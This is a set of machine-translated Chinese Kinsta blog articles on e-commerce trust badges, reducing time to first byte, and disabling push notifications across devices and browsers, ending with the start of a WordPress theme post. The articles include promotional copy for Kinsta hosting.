在产品页面上放置信任印章的典型位置是“添加到购物车”或“立即购买”按钮旁边。在顾客走向收银台之前,这给了他们额外的信心。
结帐页面
对于大多数企业来说,放置信任徽章的最重要的地方是结账页面或表格。
你希望用户在质疑输入支付信息是否安全的时候看到信任的印记。
信任徽章的类型
信任徽章可以是任何网站图标,旨在给网站访问者一种安全感。以下是几种最常见的类型。
SSL 证书徽章
SSL 代表安全套接字层。这是一种对两个应用程序(如浏览器和 web 服务器)之间发送的数据进行加密和认证的协议。
TLS 是传输层安全性的缩写,是 SSL 的更新版本,但 SSL 仍然是更常用的术语。虽然一些提供商引用 SSL/TLS 证书,但其他提供商将使用 SSL 来引用这两种协议。
您可能很熟悉浏览器中 URL 旁边的小挂锁,它表示安全连接(或警告消息,表示您的连接不是私有的)。这些都是基于拥有一个有效的 SSL 证书。
许多 SSL 证书提供商也提供信任徽章,放在您的网站上。
The TrustLock SSL trust badge.
安全徽章
SSL 站点印章并不是表明您的站点值得信赖的唯一标志。
一些提供商为您获取徽章所需的安全功能设定了标准。例如,TRUSTe 根据企业对 GDPR 等国际隐私标准的遵守情况授予企业信任徽章。
接受付款徽章
你会注意到,在上面的 Baymard Institute 研究中,7%的受访者放弃了购物车,因为缺乏付款选择。
消费者通常希望看到有品牌认知度的支付选择,比如 Visa、MasterCard 或 PayPal。当购物者可以使用他们通常的支付方式时,网站会感觉更加安全和合法。
一个被接受的支付信任徽章向你的网站访问者宣传你接受那些方法并且在那些支付提供商严格的安全要求下工作。
PayPal’s accepted payment trust badge.
这些徽章通常是免费的,很容易从支付卡或在线支付公司获得。你可以访问他们的网站了解更多信息。
第三方认可徽章
有几个信任徽章可以从整体上认可你的企业。
一个令人印象深刻但很难获得的徽章是由商业改善局(BBB)提供的。获得 BBB 认证后,您可以展示此徽章。申请认证将花费你 75 美元。假设 BBB 调查了你的商业实践,发现你符合它的标准。在这种情况下,根据企业的规模,你每年至少要支付几百美元来维持认证。
还可以通过谷歌评论免费获得代言徽章。只要你去年至少有 100 个评论,这个徽章就会显示你的卖家评分。你所要做的就是遵守谷歌评论的服务条款。
Google Customer Reviews trust badge.
BBB 徽章会给你的老顾客留下深刻印象。然而,如果你的网站受众包括千禧一代和 Z 世代购物者,谷歌将会有更多的品牌认知度。
如果你是一家 SaaS 公司,那么你也可以加入由 G2 Crowd 这样的众包评论网站提供的徽章。这会提高你在潜在客户中的信任度。
Kinsta’s badges from G2 Crowd for the hosting platform category.
正是因为这个原因,你会在 Kinsta 的网站上看到这些 G2 徽章的显著特征。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
担保徽章
担保徽章与我们讨论过的其他类型的信任印章略有不同。
它们通常不是由第三方提供的,也不依赖于认证过程。它们只是一个图像,表明你的公司对你的客户的承诺。
一些标准担保徽章包括:
- 免运费
- 免费退货
- 退款保证
这些徽章至关重要,因为数据安全并不是客户对电子商务的唯一担忧。他们还想证明你能提供顺畅的购物体验。
保证徽章有效。一个网站通过增加一个简单的 30 天退款保证徽章,销售额增加了 32.57%。
促进电子商务转化的最佳信任徽章
你的网站访问者感觉越安全,他们就越有可能转变。
从 SSL 徽章开始。如果你在经营电子商务或收集个人信息,拥有 SSL 证书是至关重要的。如果你有证书,为什么不让你的顾客知道呢?
接受支付徽章是免费的,谨慎的,很容易添加到您的网站上,所以它们也是一个很好的电子商务选择。
除此之外,你选择的徽章取决于你的业务和你的观众。对于某些客户群体来说,BBB 认证带来的提升可能值得您削减预算。对于其他人来说,意义不会很大。
如果你有自己引以为豪的政策,比如退款保证,那么设计你的徽章来宣传你的产品就很有价值。
要考虑的一个因素是名字识别。虽然任何徽章都可以激发客户或会员的信任,但影响最大的徽章是那些我们都知道的徽章:赛门铁克、谷歌、商业改善局和迈克菲。
The most trusted site badges. (Image source: Baymard)
从哪里获得信任徽章
你可以看到信任徽章的价值。但是你从哪里得到它们呢?
就像“免费送货”图标一样,一些信任徽章只是你可以自己创建的图像。但是大多数需要第三方的许可。
WooCommerce 证书
如果你在你的 WordPress 电子商务网站上使用 WooCommerce,有必要用 SSL 保护它。在过去,网站所有者总是不得不为 SSL 认证付费,但是现在你有了一些免费的选择。
如果 Kinsta 托管您的网站,我们将通过内置的 Cloudflare 集成为所有网站提供免费的带通配符支持的 Cloudflare SSLs。Cloudflare 在其网站上提供信任徽章。
大多数主机提供的另一个流行的免费 SSL 证书是让我们加密。然而,请注意,尽管 Let's Encrypt 是一个很好的安全选项,但该公司明确不允许使用 Let's Encrypt 徽标的信任徽章。
一些付费的 SSL 提供商确实授予站点印章,包括:
WordPress 的其他徽章
使用 WordPress 或 WooCommerce 的插件,许多信任徽章可以很容易地添加到你的网站上。
所有的 Kinsta 托管计划都包括来自我们资深 WordPress 开发者和工程师的 24/7 支持。与支持我们财富 500 强客户的同一个团队聊天。查看我们的计划!
一个可以考虑的选项是 WooCommerce 插件的客户评论。这个插件用额外的功能增强了标准的 WooCommerce 评论,包括你可以添加到你的网站上的信任徽章。徽章显示经过验证的客户评论摘要。
对于我们没有提到的任何信任徽章,请查看提供商的网站。大多数人都有领取徽章的说明。
如何将信任徽章添加到您的网站
在你的网站上放一个信任徽章并不需要太多的专业技术。使用基本的 WordPress 编辑器或者其他简单的方法可以添加很多。
WooCommerce 结账模板
默认的 WooCommerce 结帐表单已经显示了接受付款的图标,起到了信任徽章的作用。但是在你的结账页面添加其他信任印章可能会更有利。
WooCommerce’s default checkout page.
如果你熟悉编码,你可以使用动作钩子自己添加元素到页面。你需要的是:
woocommerce_before_checkout_formwoocommerce_checkout_before_customer_detailswoocommerce_checkout_billingwoocommerce_checkout_shippingwoocommerce_checkout_after_customer_detailswoocommerce_checkout_before_order_reviewwoocommerce_checkout_order_reviewwoocommerce_checkout_after_order_reviewWoocommerce_after_checkout_form
对于更基本的定制方法,浏览许多可用的 WooCommerce 主题,并找到一个允许您在信任徽章位置添加图像的主题。它不像定制编码那样灵活,但是很简单。
还有一些 WordPress 插件可以让你在结账页面和其他地方显示徽章。
WordPress 插件
使用 WordPress 插件给你的网站添加印章有无穷无尽的选择。我们已经提到了一些客户评论的徽章:Google 评论和 WooCommerce 的客户评论。
审查插件是让你的网站获得信任的好方法。有些甚至提供额外的基于评论的徽章,比如 Yelp 评论的小工具。
其他插件,如 YITH WooCommerce 徽章管理,让你创建各种风格的徽章,添加到你的产品目录中。这种徽章插件非常适合那些“免费送货”或“免费退货”的徽章。
最后,一些 WordPress 安全程序,如 SiteLock ,如果你使用插件,会提供站点封条。 TrustedSite 是一个插件,可以让你获得一系列认证,包括信任徽章。
形象
你的信任徽章可以像添加到 WordPress 页面的图片一样简单。只需上传图像文件并将其有策略地放置在您选择的页面上。
HTML 或 JavaScript
一些信任徽章提供源代码,将徽章插入到您的网站上。徽章通常包含指向证书信息的链接或弹出窗口。
你可以将这些徽章添加到你的 WordPress 主题的页眉或页脚中。
在你的网站上建立客户信任的其他方法
第一印象至关重要。如果你的网站看起来不专业或者有技术问题,客户的第一反应会是退出。
这就像走进一家实体商店,看到闪烁的灯光和地板上的垃圾。你想去那里购物吗?
信任徽章是获得专业、可信外表的一种方式,但不是唯一的选择。尝试这些方法来建立消费者对你网站的信任。
专业网站设计
一个业余爱好者出现在你的网站上会让客户怀疑你是否有安全措施。幸运的是,即使你不是一个有经验的设计师,一个时尚的 WordPress 主题也能给你一个专业的外观。
你选择的设计应该是移动响应。没有什么比一个不能在客户智能手机上正确显示的网站更让人感到“过时”了。
请确保在结帐时避免任何布局错误,例如重叠文本。Baymard Institute 对信任徽章进行的同一项研究发现,这些小的设计错误极大地削弱了客户的安全感:
Layout errors on the checkout page. (Image source: Baymard)
如果你的网站运行得不好,消费者也会很快感到沮丧,对你的公司失去信心。确保你的网站速度是优秀的,访问者没有遇到任何关于错误或故障的。
在线评论
你的企业有很棒的东西可以提供给客户——但不要指望他们会相信你的话。这些天,大多数人转向在线评论来评估一家公司或产品。
77%的消费者认为顾客评论是他们购买决定的决定性因素。他们习惯了这些评论随时可用,因为它们在主要电子商务网站的产品页面上。
在你的网站上放评论通过透明建立信任。他们帮助客户做出购买决定,同时证明你对你的产品或服务没有任何隐瞒。
社交媒体存在
如果你已经有了一个网站,你可能也看不到对社交媒体页面的需求。毕竟,对于忙碌的小企业主来说,维护多个配置文件是额外的工作。
但如今,消费者希望在社交媒体上找到他们最喜欢的品牌。与用户互动有助于建立你公司的知名度,当他们看到使用你网站的用户群时,他们会对你更有信心。
你甚至可以加入 25%的小企业,与社交媒体有影响力的人一起工作,从而获得社会证明。
你网站上的社交媒体图标可以作为一种信任徽章——它们表明你在你的客户经常光顾的地方很活跃,并准备好与他们互动。
不要只是告诉你的客户他们可以信任你的企业...给他们看看!(看着你的转化率飙升)💪🏅
摘要
你的网站访问者很谨慎,但是你可以赢得他们的信任。
信任徽章激励客户做出飞跃,从你的电子商务企业购买,或者注册你的会员网站。
你是一个忙碌的企业主,你的时间是宝贵的。在你的网站上添加小徽章可能不是最重要的,但是数据显示它们可以增加转化率。另外,很多都是免费的,很容易放在你的网站上。
希望超越信任徽章?了解更多回收废弃购物车的方法。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何减少 TTFB 以改善页面加载时间
说到你的站点的整体速度,很多时候我们关注前端性能和优化来提高页面加载速度。
然而,有时从服务器端来看是很好的,在那里你的网站开始加载。
今天,我们将深入探讨 TTFB(首字节时间)如何影响你,并讨论一些简单的方法来减少它。TTFB 通常是一个被忽视的性能因素,但是在测试你的站点速度时,它应该被考虑在内。
什么是 TTFB?
TTFB 代表第一个字节的时间。简而言之,这是对浏览器在从服务器接收到第一个字节的数据之前必须等待多长时间的度量。获取数据的时间越长,显示页面的时间就越长。一个常见的误解是,这是在 DNS 查找次之后计算的,然而,最初计算网络中的 TTFB 总是包括网络延迟。这涉及 3 个步骤的过程,延迟和等待时间可能发生在中间的任何地方,累积起来就是总的 TTFB。
Waiting TTFB
1.对服务器的请求
当有人访问你的网站时,首先发生的是一个 HTTP 请求从客户端(浏览器)发送到服务器。在此步骤中,有多种因素会导致延迟。缓慢的 DNS 查找时间会导致请求时间增加。如果服务器的地理位置很远,这可能会在数据传输的距离中引入延迟。此外,如果您有复杂的防火墙规则,这可能会增加路由时间。还有别忘了客户端的网速。
2.服务器处理
请求发出后,服务器现在必须处理它并生成响应。这可能会引入许多不同的延迟,如缓慢的数据库调用,太多的第三方脚本,没有缓存您的第一次响应,糟糕的优化代码或主题,以及低效的服务器资源,如磁盘 I/O 或内存。
3.对客户的回应
在服务器处理完请求后,它必须将请求发送回客户机(或者说发送回第一个字节)。这受到服务器和客户端的网络速度的严重影响。如果客户端从 Wi-Fi 热点缓慢上网,这将反映在 TTFB 中。
T3】
TTFB 重要吗?
重要的是要明白 TTFB(到达第一个字节的时间)并不等同于网站速度。这实际上是对反应能力的一种衡量。网络上有很多关于 TTFB 是否重要的讨论。有人说它毫无意义( Cloudflare 、 LittleBizzy ),也有人说它很重要(伊利亚·格里戈利克,谷歌的网络性能工程师)。双方都提出了一些关于为什么或为什么它不重要的有效观点,也提出了一些关于它实际上是如何计算的问题。
Moz 甚至对搜索排名和首字节时间的相关性做了深入研究。然而,很难知道这是不是原因,或者 TTFB 较低的网站通常也更快,这反过来可能会受到谷歌页面速度排名因素的影响。
Does TTFB matter? It contributes to your overall speed, so what do you think? 😉Click to Tweet
然而,与其花时间纠结这是否重要,我们更愿意关注你可以做的优化来改进这个指标。你所做的一切都有助于网站的整体速度,而这反过来又会影响你的 TTFB。在我们的测试中,TTFB 大得多的站点只是加载速度慢了些。
一般来说,任何低于 100 ms 的都是很棒很好的 TTFB 。 Google PageSpeed Insights 推荐服务器响应时间在 200 ms 以下。如果你在 300-500 毫秒范围内,这是相当标准的。如果你超过 600 毫秒,你可能在你的服务器上有一些错误的配置,或者是时候升级到一个更好的 web 栈了。或者遵循我们下面关于如何减少你的 TTFB 的建议。记住 SSL/TLS 协商也是一个因素。
如何测量你的 TTFB
有许多不同的方法可以测试你的 TTFB。我们将在下面探索几个。但是请记住,每个工具都会给出稍微不同的结果,所以简单地使用一个工具并坚持使用它作为基线是很重要的。
使用 Google Chrome DevTools 测量 TTFB
你可以通过启动 DevTools 在谷歌 Chrome 中测量 TTFB。但是请记住,如果您在计算机上测试,TTFB 会受到网络延迟和互联网连接的影响。因此,使用从数据中心进行测试的第三方工具(如下所示)可能更有效。
- 从 Chrome 菜单中选择更多工具>开发者工具。
- 右键单击页面元素并选择检查
- 使用键盘快捷键
Ctrl+Shift+I(Windows)或Cmd+Opt+I(Mac)
您可以启动网络窗口并查看您站点的性能。
Google Chrome devtools TTFB
用 Geekflare 的工具测量 TTFB
Geekflare 有一个很棒的免费工具集,你可以用它来测试和解决你网站上的问题。 Geekflare 的 TTFB 工具简单快捷,可以让你从全球三个地方看到你的第一个字节的时间有多快(低)。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
Geekflare TTFB test tool
用 WebPageTest 测量 TTFB
你也可以用网页测试来测量你的 TTFB。根据他们的术语表,目标时间是 DNS、套接字和 SSL 协商所需的时间+100 毫秒。每超出目标 100 毫秒,将扣除一个字母等级。正如你在下面的测试中所看到的,这个站点的 TTFB 为 0.256 秒或 256 毫秒。
Webpagetest First Byte Time
使用 Pingdom 测量 TTFB
Chrome 和 WebPageTest 将其称为 TTFB。然而,如果您使用的是 Pingdom ,它实际上被称为“等待”时间。请务必查看我们关于如何使用 Pingdom 的深度指南。
Wait time in Pingdom tools
用 GTmetrix 测量 TTFB
在 GTmetrix 中,与 Pingdom 一样,TTFB 被称为等待时间。请务必查看我们关于如何使用 GTmetrix 的深入指南。
Measure TTFB in GTmetrix
使用 KeyCDN 工具测量 TTFB
KeyCDN 有一个很棒的 web 性能测试工具,在这个工具中,你可以同时从 14 个不同的位置测量你的 TTFB。正如你在下面的测试中看到的,TTFB 在美国很低,而在海外要高得多。这是因为我们的服务器实际上位于美国。这证明了延迟和距离对 TTFB 的影响。
KeyCDN TTFB test
还有一些其他各种各样的工具来测量 TTFB,比如 Sucuri 性能工具和 ByteCheck 。你知道吗?甚至谷歌分析也有一个部分来查看你的平均响应时间。只需点击进入“行为>站点速度>概述”
Google Analytics report for TTFB
4 种方法来减少你的网站上的 TTFB
现在,让我们深入探讨一下如何降低网站的 TTFB。
1.利用快速主机
减少 TTFB 的第一个方法是确保您使用的是快速主机。我们比较了第三方共享主机的 TTFB(位于亚利桑那州凤凰城)和 Kinsta 的 TTFB(位于爱荷华州康瑟尔布拉夫斯)。我们使用了完全相同的设置,运行默认的 217 主题。请记住,Kinsta 现在拥有所有 35 个谷歌云平台位置,所以战略性地将你的网站放在离你的访问者更近的地方是很重要的。
切换到一个更快的主机可以减少你的网站高达 200%的 TTFB。免费试用 kin sta。
Kinsta 还在所有托管计划中纳入了谷歌云平台的高级层网络。许多其他主机提供商使用谷歌云的标准层网络,这导致速度较慢。
共享主机 TTFB
在所有地区,平均 TTFB 为 520 毫秒。在美国和加拿大,的平均 TTFB 是 240 毫秒。
Shared hosting TTFB
金斯塔 TTFB
在所有地区,平均 TTFB 为 412 毫秒。在美国和加拿大,的平均 TTFB 是 164 毫秒。如果你用 Kinsta 托管,你也可以选择在欧洲或亚洲托管你的站点。参见谷歌云数据中心位置列表。
Managed WordPress hosting TTFB
简单地说,通过使用更快的主机,我们看到全球的 TTFB 下降了 20%。美国和加拿大的 TTFB 下降了 32%。
拥有一个好的应用程序、数据库和管理的 WordPress 主机(比如 Kinsta),以及一个精心设计的架构,对于降低你的 TTFB 是至关重要的。
这也是一个很好的例子,可以让你仔细选择一个位于你的客户所在地区的地方。如果你的大部分客户在美国,不要把你的服务器放在欧洲(尽管 CDN 可以帮助抵消一部分)。
2.实施 CDN
另一种降低 TTFB 的简单方法是利用内容交付网络 (CDN)。如果你有一个网站,为全国各地或全球各地的访问者提供服务,这会大大降低你的 TTFB。正如我们上面看到的,位置非常重要。我们运行了一个小测试来展示 KeyCDN 作为我们的 CDN 提供商的区别。每个测试运行 5 次,取平均值。
不带 CDN 的 TTFB】
我们首先在禁用 CDN 的情况下运行测试,正如您所见,我们的总加载时间为 1.45 秒,资产的平均 TTFB 约为 136 毫秒。
TTFB before adding a CDN
带 CDN 的 TTFB】
然后我们启用我们的 CDN,再次运行测试。如您所见,我们的总加载时间下降到了 788 毫秒,平均 TTFB 现在是 37 毫秒!CDN 能带来多大的不同。另一个需要注意的重要事项是,我们选择了斯德哥尔摩的位置来执行该测试。为什么?因为我们想向您展示通过缩短物理距离可以实现的真正改进。斯德哥尔摩有一个 CDN POP,所以我们的内容是从斯德哥尔摩提供的。
TTFB after adding a CDN
注意:如果您正在使用 Cloudflare,您可能会有一个稍微高一点的 TTFB 。这很可能是由于运行完全代理服务的额外开销和复杂性。请记住,Cloudflare 具有一些 CDN 提供商没有的额外防火墙和其他功能。所以你需要自己拿主意,这样对你更有利。如果你的整个网站没有得到适当的优化,那么牺牲稍微高一点的 TTFB 可能是值得的。
然而,你可能也想看看 WP Bullet 关于使用 Cloudflare 页面缓存来降低 TTFB 的指南。这可能需要一些额外的设置和测试。确保运行您自己的测试,因为每个环境都是不同的。
建议阅读:如何为 WordPress 设置 Cloudflare APO。
T3】
3.在您的站点上使用缓存
减少 TTFB 的第三种方法可能也是最简单的方法是在站点上使用缓存。许多人只认为缓存有助于减少加载时间,但事实上,它也有助于减少 TTFB,因为它有助于减少服务器处理时间。我们在运行和不运行缓存的情况下再次运行了一些测试。每个测试运行 5 次,取平均值。
无缓存运行
我们通过 Pingdom 运行该网站,在没有运行缓存的情况下,我们的网站获得了 1.17 秒的加载时间和 560 毫秒的 TTFB。
Non-cached TTFB
启用缓存
然后,我们启用缓存,并再次通过 Pingdom 运行站点。这次我们的站点获得了 643 毫秒的加载时间和 57 毫秒的 TTFB。
TTFB with WordPress caching enabled
因此,通过启用缓存,我们能够将 TTFB 降低高达 90%!你可以阅读更多关于金斯塔的缓存。我们在服务器级别上这样做,这意味着不需要缓存插件。如果你没有使用托管的 WordPress 主机,我们推荐使用一个免费的缓存插件,比如缓存使能器。
4.使用高级 DNS 提供商
最后但同样重要的是,DNS 在 TTFB 中也发挥了作用。很难准确计算它受到了多大的影响,但您仍然可以看到总的 DNS 查找时间,并看到有更快和更慢的提供商。我们用 SolveDNS 速度测试工具运行了几个测试。下面是一个使用 NameCheap 的免费 DNS 的域名和响应时间的例子。
免费域名廉价 DNS
Free DNS speed
下面是一个使用亚马逊 Route 53 的高级域名系统的例子。正如你所看到的,亚马逊的 DNS 查询速度要快得多。通常,优质 DNS 提供商的速度会更快。Cloudflare 是一款免费的软件,性能也很棒。
亚马逊 53 号路由域名系统
Amazon premium DNS speed
请务必查看我们关于为什么您应该使用高级 DNS 提供商的帖子。我们与亚马逊 Route 53 在金斯塔合作,所有顾客都可以免费使用。
摘要
您可以优化或修复许多其他东西来减少 TTFB,例如数据库缓存、磁盘 IO、交换空间使用、RAM、PHP 设置、MySQL 设置、网络设置、TLS 开销等。但是上面提到的方法很容易实现,并且会给你最快的性能提升。所以下一次有人问你如何减少你的 TTFB,请记住,快速主机,CDN,缓存和 DNS 都发挥了巨大的作用。修复或改善这些瓶颈将会奏效。
你对 TTFB 有什么体验?我们很想听听下面的内容。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何关闭推送通知(Windows/Mac、iOS/Android、所有浏览器等)
推送通知是一个非常有用的功能。他们帮助通知你关于更新和提供的信息,并几乎即时提供关键信息。然而,在您的所有设备上处理大量弹出消息可能会让人不堪重负。
幸运的是,你可以定制和管理在你的设备和浏览器上看到的推送通知。
在本文中,我们将向您展示如何在大多数主流操作系统(OS)和 web 浏览器中关闭发布通知。我们开始吧!
Tired of dealing with non-stop pop-up messages across your devices? 💥 Read this👇Click to Tweet
更喜欢看视频版?
什么是推送通知?
推送通知是弹出消息,显示在您的设备上以提供快速通知。例如,在移动设备上,当您收到短信或某个应用程序需要您的关注时,推送通知就会出现:
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
An example of a push notification on iOS
推送通知不仅限于移动设备。如果您使用 Windows 或 macOS 电脑,您也会经常看到这些元素。一些例子包括:
- 软件更新通知
- 来自 web 浏览器的通知
- 新电子邮件提醒
理解这一点很重要,在大多数情况下,推送通知以两种方式工作。有些可以在操作系统级别配置和禁用,有些则基于应用程序对应用程序进行操作。
例如,有些网站会询问您是否希望通过浏览器接收推送通知:
An example of a website push notification request
在接下来的几节中,我们将从两个角度向您展示如何禁用推送通知,涵盖每个主流浏览器和操作系统。
T3】
如何在操作系统级别关闭推送通知
下面,我们将带你了解如何关闭 Windows 10、macOS、Android 和 iOS 的发布通知。先说 Windows。
如何在 Windows 10 上关闭推送通知
Windows 允许您完全禁用推送通知,暂时将其静音,或针对特定应用将其关闭。要进入 Windows 的通知设置,打开开始 菜单,进入设置>系统>通知&动作。
要完全禁用通知,请关闭选项获取来自应用程序和其他发件人的通知:
Windows 10 push notification settings
由于推送通知可能包含重要信息,您可能希望仅禁用特定应用程序的通知(那些您往往会忽略的应用程序)。
为此,向下滚动,直到到达从这些发件人设置中获取通知部分。在那里,您可以关闭每个已安装应用程序的推送通知:
Disabling notifications for individual apps in Windows
最后,Windows 包括一个名为“焦点助手”的功能,它可以让你选择暂时禁用或静音推送通知。
要使用对焦辅助,点击通知 选项下的对焦辅助设置 。在下一个屏幕上,您将能够决定要禁用哪些通知以及该功能何时发挥作用:
Windows focus assist’s settings
总的来说,Windows 为您提供了大量管理推送通知的选项。关键是要弄清楚哪些应用程序值得接收警报,哪些应用程序只会分散注意力。
如何在 macOS 上禁用推送通知
如果您使用 macOS,您可以暂停或停用通知,这取决于您的偏好设置。要停止所有通知,打开苹果菜单,进入系统偏好设置>通知。
你将看到可以向你发送通知的所有应用的列表,你可以禁用每个单独项目的权限:
Notification settings in macOS
要暂停通知,您可以在同一个通知 窗口下,启用左边的勿扰 设置:
The Do Not Disturb macOS notification settings
当请勿打扰设置打开时,通知不会中断您的工作。要访问它们,你需要打开通知中心。
这是它们累积的地方,直到您取消暂停通知。
如何在 iOS (iPhone 和 iPad)上禁用推送通知
iOS 允许您完全停用推送通知,或者针对单个应用程序关闭它们。
要访问 iOS 通知设置,进入设置>通知T3】菜单。
在菜单的顶部,你会看到显示预览 s 选项。设置为从不 将关闭所有推送通知:
Notifications menu in iOS
如果您只想禁用特定应用程序的通知,请不要更改之前的设置。相反,向下滚动到通知 菜单,然后点击某个应用程序:
App notification menu in iOS
从该列表中,您可以配置每个应用程序的通知设置或禁用它们。这项功能可以方便地过滤掉你不感兴趣的邮件。
如何在 Android 上禁用推送通知
你可以通过进入设置>通知 选项来禁用 Android 上的推送通知。与 iOS 类似,Android 允许你关闭单个应用的推送通知,或者使用“请勿打扰”模式。
要禁用特定应用的通知,向下滚动到最近发送的菜单,并按下下方的更多T5】按钮:
Android’s app notifications settings screen
在下一个屏幕上,您可以使用右侧的按钮来关闭任何应用程序的通知:
Turning off individual app notifications in Android
要在 Android 中启用免打扰模式,请返回到通知屏幕,找到位于底部的免打扰 按钮。在下一个屏幕上,您可以打开免打扰设置,并配置持续时间:
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
安卓的勿扰模式。
该屏幕还包括用于配置免打扰规则例外的选项。例如,您可以让某些应用程序的通知仍然显示在您的屏幕上。
如何关闭 Web 浏览器的推送通知
在本节中,我们将向您展示如何关闭谷歌浏览器、Safari 浏览器、Mozilla Firefox 浏览器和微软 Edge 浏览器的推送通知。先说 Chrome。
如何在谷歌浏览器中关闭推送通知
如果你使用 Chrome,你可以阻止网站请求许可发送推送通知,这实质上是完全禁用它们。浏览器还可以让你屏蔽特定网站的通知。
要访问这些设置,进入设置>隐私和安全、T3】并选择站点设置选项:
Chrome’s privacy settings menu
在下一个屏幕上,在权限设置下,点击通知:
Configuring Chrome’s permission settings for push notifications
要关闭所有通知,禁用选项,即站点可以要求发送通知。这将阻止网站向您显示发送推送通知的请求:
Disabling push notifications in Chrome
如果你点击添加 按钮,Chrome 会让你输入特定的网址来屏蔽通知。白名单网站也有相应的设置,你可以滚动到屏幕底部:
Whitelisting websites for push notifications in Chrome
通过结合所有三种设置,您可以使网站无法向您发送分散注意力的权限请求。您还可以将您希望看到通知的 URL 列入白名单。
如何在 Safari 中关闭推送通知
在 Safari 中禁用推送通知相当简单。为此,请在浏览器中访问偏好设置网站>通知T3】设置。登录后,您将看到一个列表,其中列出了请求向您发送推送通知的网站:
与宕机和 WordPress 问题做斗争?Kinsta 是一款考虑到性能和安全性的托管解决方案!查看我们的计划
Push notification settings Safari
您可以通过该列表禁止来自特定网站的通知,反之亦然。你还会注意到在通知窗口的底部有一个选项,写着允许网站请求发送推送通知的许可。
关闭该选项将阻止站点请求向您发送通知的权限。
如何在 Mozilla Firefox 中关闭推送通知
有了 Firefox,你可以阻止网站向你发送推送通知,白名单例外,并暂时禁用所有这些。
要访问火狐的通知设置,导航到选项>隐私&安全,在权限下寻找通知选项:
Accessing Firefox’s permissions settings
要禁用推送通知直到你重启浏览器,勾选选项暂停通知直到 Firefox 重启。
要对弹出警报和消息进行更多控制,请单击通知选项右侧的设置 按钮。将会打开一个窗口,列出所有请求向您发送推送通知的网站:
Disabling push notifications in Firefox
对于每个网站,您可以选择是阻止还是允许通知。还可以选择从列表中删除单个站点,或者将其完全清除。
最后,Firefox 允许您通过启用位于窗口底部的的阻止新请求请求允许通知功能来阻止新的推送通知请求。
如何在 Microsoft Edge 中关闭推送通知
与大多数其他浏览器一样,Microsoft Edge 提供了多种方法来禁用、阻止和加入白名单通知。该浏览器还包括一个名为安静通知的功能,它将所有推送通知捆绑在一个图标下,这样它们就不会打断你。您可以随时查看它们。
要访问 Edge 的通知设置,请转到设置>cookie 和站点权限、 ,然后选择通知 选项:
Microsoft Edge’s cookies and site permissions settings
在下一个屏幕上,如果您想完全关闭 Edge 中的推送通知,请禁用发送前询问选项。
如果您想阻止或允许某些网站,您可以点击每个设置旁边的添加按钮:
Disabling push notifications in Edge
您还会注意到安静通知请求选项,该选项在默认情况下是打开的。启用该设置后,当您使用浏览器时,通知不会打扰您。
T3】
如何在脸书关闭推送通知
虽然脸书既不是操作系统也不是网页浏览器,但它是世界上最受欢迎的社交媒体平台之一。因此,我们收到了很多关于如何禁用推送通知的问题,以便提醒不会中断您的浏览体验。
要访问脸书的推送通知设置,进入设置&隐私>设置>通知。您将可以访问脸书可以发送的所有通知类型的列表,并且可以选择要禁用的类型:
Facebook’s notifications settings
请记住,脸书使用几种通知类型。对于列表中的每个选项,您可以关闭不同渠道的通知,包括推送元素、电子邮件甚至短信。
如果您想完全禁用通知,向下滚动到如何获得通知部分。展开浏览器菜单,你应该看到你的默认浏览器出现在推送通知下:
Disabling browser push notifications in Facebook
您可以在这里禁用脸书浏览器推送通知,以及伴随它们的声音。
如何在 Gmail 中关闭推送通知
如果您使用 Gmail ,您可能还想阻止推送电子邮件通知出现在您的桌面上。无论您使用 Chrome、Firefox、Safari 还是其他浏览器,禁用这些信息的过程都是一样的。
首先打开 Gmail,点击右上角的齿轮图标,然后查看所有设置。向下滚动到桌面通知部分:
Turning off notifications in Gmail
选择邮件通知关闭选项。
完成后,点击页面底部的保存更改按钮。
摘要
尽管推送通知非常有用,但它们是生产力杀手。理想情况下,您将决定哪些应用程序和网站可以向您发送推送通知,因此您可以完全控制您看到的通知。
定制推送通知的工作方式很简单。几乎每个浏览器、应用程序、设备和操作系统都提供了设置,使您能够定制该功能以满足您的独特需求。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
2019 主题介绍(古腾堡主题)
WordPress 5.0 即将到来,我们许多人同时感到兴奋和担忧。古腾堡给我们使用 WordPress 的方式带来了巨大的变化,如果我们在没有测试的情况下更新我们的安装,肯定会对我们的网站产生一些影响。但是不要担心,我们有一个关于如何禁用古腾堡 WordPress 编辑器(即使只是暂时的)的帖子,以防止不受支持的主题和插件破坏我们的网站。
你可能会惊讶地发现我们已经在使用 WordPress 5.0 了。事实上,我们是!正如 Matt 在 Make WordPress 博客上所说:
